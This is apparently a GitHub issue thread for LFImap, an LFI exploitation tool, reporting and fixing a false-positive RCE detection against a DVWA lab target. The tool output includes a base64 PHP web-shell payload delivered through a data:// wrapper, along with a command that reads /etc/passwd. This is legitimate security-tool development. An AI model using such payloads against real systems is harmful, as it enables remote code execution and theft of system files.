hansmach1ne / LFImap

Local File Inclusion discovery and exploitation tool
Apache License 2.0

RCE false positive when parameter is vulnerable to XSS #60

Closed hansmach1ne closed 2 weeks ago

hansmach1ne commented 3 weeks ago
└─$ python3 lfimap.py -U "http://192.168.56.104/dvwa/vulnerabilities/xss_r/?name=aa#" -C "security=low; PHPSESSID=fd6582cc1b2843b479965f570419b6de" --lhost 192.168.56.113 --lport 99 -r -P "127.0.0.1:8080" -d -heur 

[i] Testing GET 'name' parameter...
[+] XSS -> 'http://192.168.56.104/dvwa/vulnerabilities/xss_r/?name=mns%3A817%3Ew%3Cgf%3B93%22%27rq' -> full reflection in response
    Content-Type: text/html;charset=utf-8
[+] RCE -> 'http://192.168.56.104/dvwa/vulnerabilities/xss_r/?name=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOz8%2B&c=cat%20%2Fetc%2Fpasswd'

----------------------------------------
LFImap finished with execution.
Parameters tested: 1
Requests sent: 16
Vulnerabilities found: 2
hansmach1ne commented 3 weeks ago

This false positive is because checkPayload looks for whether PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4K from the test payload is reflected in the response; however, the test payload contains a different b64-encoded value: data.py: L18, L19.

hansmach1ne commented 2 weeks ago

Changed the payload to include PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4K (data.py: L18, L19).

[i] Testing GET 'name' parameter...
[+] XSS -> 'http://192.168.56.104/dvwa/vulnerabilities/xss_r/?name=7ee%3A99l%3Ew%3Cmv%3B81%22%27cw' -> full reflection in response
    Content-Type: text/html;charset=utf-8

----------------------------------------
LFImap finished with execution.
Parameters tested: 1
Requests sent: 17
Vulnerabilities found: 1